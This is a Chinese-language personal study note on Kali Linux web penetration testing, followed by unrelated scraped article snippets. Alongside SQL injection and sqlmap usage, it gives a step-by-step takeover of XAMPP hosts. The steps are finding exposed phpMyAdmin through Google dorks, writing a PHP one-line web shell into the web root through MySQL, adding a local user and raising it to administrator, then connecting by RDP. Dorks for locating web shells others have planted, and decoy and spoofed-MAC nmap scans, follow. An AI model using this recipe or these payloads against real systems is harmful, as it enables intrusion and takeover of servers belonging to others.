kali linux web滲透測試學習筆記

2021-07-13 10:22:38 字數 3084 閱讀 8036

第一步:啟用postgresql服務。service postgresql start

第二步:啟用metasploit服務。service matasploit start

第三步:啟動框架。msfconsole

1.**:asp?id+13,後面加',看看是什麼資料庫,然後輸入1=1,1=2,得到資料庫是microsoft acess

拆解表名

1.拆解乙個表的列名

2.得到感興趣的字段的值

找到登入按鈕

教訓:資料庫密碼一定要加密!

index.php?id=1,同上,得到資料庫為mysql

1.掃瞄資料庫

2.掃瞄某個資料庫的表

命令:sqlmap -u 目標**--dbms mysql

-d 資料庫名 --tables,引數可自行選擇

檢視表字段

同上將找到的路徑放進去檢視,乙個個試試,附加上檢視源**,找manage

提公升管理員許可權:

用fiddler看看頁面情況,檢視系統返回的**,編輯建立html檔案,執行,設定fiddler(auto),將返回結果儲存在本地。

返回頁面

1.尋找持續構建工具jenkins管理面板,有可能獲取某些專案的源**或者敏感資訊;

2.綜合利用各種資訊搞定xampp,乙個整合架構,包括比如phpmyadmin之類的東西

3.後門查詢

4.關於google hack database

google hack語法查詢:

1.inurl:8080 intitle:"dashboard [jenkins]"     造成源**洩露

尋找安裝xampp的主機:inurl:"xampp/index"  intext:"xampp for windows"

1)尋找phpmyadmin不用驗證或者弱口令管理頁面,通過mysql的root許可權插入一句話木馬提取,獲取伺服器管理許可權

2>>連線**的mysql伺服器

use mysql

3>>建立表

4>>向表中插入資料,其實插入的是一段命令,呼叫cmd並且在系統環境下執行

命令:insert into aa (packet) values('

<? @sysytem($_get["cmd"]); ?>
')

5>>select * into outfile ' / / / /aa.php ' from aa,這裡的路徑應該是可執行的。可以將路徑貼上下來,寫如phpinfo的路徑

6>>訪問這個**位址。........../aa.php

7>>好了,接下來我們前面插入的那句話就要起作用啦。試著訪問........../aa.php?cmd=dir,這裡可以寫好多命令哦

8>>接下來建立賬號cmd=net user 小明 123456 /add  ,建立成功!

9>>將我們建立的賬戶新增到管理員使用者組cmd=net localgroup administrators 小明 /add

10>>啟動mstsc,遠端連線,使用者名稱和密碼就是我們剛剛建立的小明和123456

google搜尋目標:intitle:"=[1n73ct10n privat shell]="

intitle:"wso 2.4"[sec.info],[files],[console],[sql],[php],[safe mode],[string tools],[bruteforce],[network],[self remove]

進入kali,用命令setoolkit啟動,選1。攻擊方法:

主機掃瞄:

namp -sl 103.10.87.1-255 列表掃瞄

nmap -pe  ip

nmap -pn ip(不適用ping掃瞄,更適用於internet)

nmap -sp ip(快速ping掃瞄),用來快速發現存活主機

-sn引數,只探測存活主機,不管埠啥的

嘗試多種掃瞄方式,來掃瞄主機

埠掃瞄:

nmap -ss ip

nmap -st ip ;tcp埠掃瞄

nmap -su ip; udp埠掃瞄

nmap -su -p 80,445 ip ;指定埠

nmap -st -v ip啟用細節模式

作業系統探測:

引數:-o(啟用作業系統檢測)

-osscan-limit(針對指定的目標進行作業系統檢測)

--osscan-guess;--fuzzy(推測os檢測結果,在nmap不能給出確定結果的情況下使用)

示例:nmap -st -o ip

nmap -st -p 3390 -o --osscan-limit ip  (只有開啟3390埠,才進行作業系統版本探測)

namp -sa -o ip

服務程式探測:

nmap -sa -sv ip  掃瞄方式ack ;掃瞄某台主機的服務程式

nmap -sv -p 22,53,110           ;掃瞄某個服務的服務程式

nmap高階用法:

nmap --iflist(檢視本地路由與介面) 可以看到閘道器位址,網路介面啥的

nmap -e 08:00:27:47:63:e6 ip(指定mac和ip位址)(本地有多個網路介面時

nmap -t4 -f -n -pn -d192.168.1.100,192.168.1.101,192.168.1.102,me 192.168.1.103(位址誘騙)前面位址都是虛假的,後面的才是真的

nmap -sv --spoof -mac 08:00:27:47:63:e6 ip(虛假mac位址)

nmap -sv --source-port 900 ip --source-port(指定源埠)

nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(掃瞄思科路由器)

nmap -su -p69 -nvv 192.168.1.253(掃瞄路由器的tftp協議)

nmap -o -f -n 103.10.87.148(-f快速掃瞄)  掃瞄常見的埠

nmap --script=brute 103.10.87.148(暴力破解)

專注於網路埠的掃瞄

官方站點:

原始碼:預設情況使用syn掃瞄方式

滲透測試的福音 既好用成本又低的雲端模糊測試

6年前一篇研究文章中提出的微軟理念 雲端模糊測試 fuzzing 將徹底改變安全測試 以 project springfield 漏洞發現專案的登場亮相作為其實現形式。project springfield 是基於azure雲的服務,依靠自動向 提交不良輸入來發現軟體漏洞。微軟提出的 雲端模糊測試即...

滲透防護牆的滲透技術

說到通道技術,我想再提一下 埠復用 很多朋友以為通道技術就是埠復用技術。那麼,錯了,埠復用是指乙個埠上建立了多個連線,而不是在乙個端 口上面開放了多個服務而互不干擾。假如你想在已經開放了www服務的主機上,在80埠再新增一項服務,只有2種可能 1.新增服務失敗 2.www服務出錯。那麼什麼是通道呢?...

怎麼滲透驗證 mysql mysql 滲透測試

這裡以kali 中的mysql 做演示 mysql 的賬號密碼 放在mysql 庫中的 user 和 password 給root 增加密碼 update mysql.user set password password echod where user root 增添mysql 使用者 inser...